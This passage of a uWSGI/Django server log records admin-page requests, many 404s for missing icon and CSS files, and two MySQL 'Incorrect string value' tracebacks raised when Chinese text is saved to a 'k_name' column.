{38 vars in 872 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 504/625] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 505/626] 219.228.146.7 () {38 vars in 928 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 506/627] 219.228.146.7 () {38 vars in 820 bytes} [Thu Jan 14 07:57:11 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 507/628] 219.228.146.7 () {38 vars in 818 bytes} [Thu Jan 14 07:57:11 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 508/629] 219.228.146.7 () {48 vars in 1025 bytes} [Thu Jan 14 07:57:13 2021] POST /kind-manage/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 509/630] 219.228.146.7 () {40 vars in 931 bytes} [Thu Jan 14 07:57:13 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 510/631] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:13 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 511/632] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:57:18 2021] GET /kind-manage/? => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 513/633] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 514/634] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 515/635] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 516/636] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 517/637] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 518/638] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 518/639] 219.228.146.253 () {48 vars in 1027 bytes} [Thu Jan 14 07:57:18 2021] POST /kind-manage/ => generated 206957 bytes in 171 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 519/640] 219.228.146.146 () {42 vars in 936 bytes} [Thu Jan 14 07:57:25 2021] GET /kind-manage/ => generated 6423 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 520/641] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 521/642] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 522/643] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 523/644] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 524/645] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 525/646] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 526/647] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 527/648] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:57:25 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 528/649] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:57:25 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 529/650] 219.228.146.253 () {40 vars in 935 bytes} [Thu Jan 14 07:57:35 2021] GET /kind-manage/? => generated 6423 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 531/651] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 532/652] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 533/653] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 534/654] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 535/655] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 536/656] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xB1\\x82\\xE5\\x8A\\xA9...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xB1\\x82\\xE5\\x8A\\xA9...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 536/657] 219.228.146.253 () {48 vars in 1029 bytes} [Thu Jan 14 07:57:35 2021] POST /kind-manage/? => generated 207040 bytes in 149 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 537/658] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 538/659] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:57:35 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 539/660] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:57:35 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 540/661] 219.228.146.253 () {40 vars in 932 bytes} [Thu Jan 14 07:57:40 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 541/662] 219.228.146.253 () {40 vars in 936 bytes} [Thu Jan 14 07:57:40 2021] GET /announcement/ => generated 8247 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 542/663] 219.228.146.253 () {38 vars in 884 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 543/664] 219.228.146.253 () {38 vars in 896 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 544/665] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:57:40 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 545/666] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 546/667] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 547/668] 219.228.146.253 () {38 vars in 819 bytes} [Thu Jan 14 07:57:40 2021] GET /static/css/animate.css => generated 3513 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 548/669] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 549/670] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 550/671] 219.228.146.253 () {38 vars in 929 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 551/672] 219.228.146.253 () {48 vars in 1029 bytes} [Thu Jan 14 07:57:47 2021] POST /announcement/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 552/673] 219.228.146.253 () {40 vars in 935 bytes} [Thu Jan 14 07:57:47 2021] GET /announcement/ => generated 7421 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 553/674] 219.228.146.253 () {38 vars in 885 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 554/675] 219.228.146.253 () {38 vars in 889 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 555/676] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 556/677] 219.228.146.253 () {38 vars in 897 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 557/678] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 558/679] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 559/680] 219.228.146.253 () {38 vars in 929 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 560/681] 219.228.146.253 () {38 vars in 821 bytes} [Thu Jan 14 07:57:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 561/682] 219.228.146.253 () {38 vars in 819 bytes} [Thu Jan 14 07:57:47 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 563/683] 219.228.146.253 () {40 vars in 937 bytes} [Thu Jan 14 07:58:15 2021] GET /announcement/? => generated 7421 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 564/684] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:58:15 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 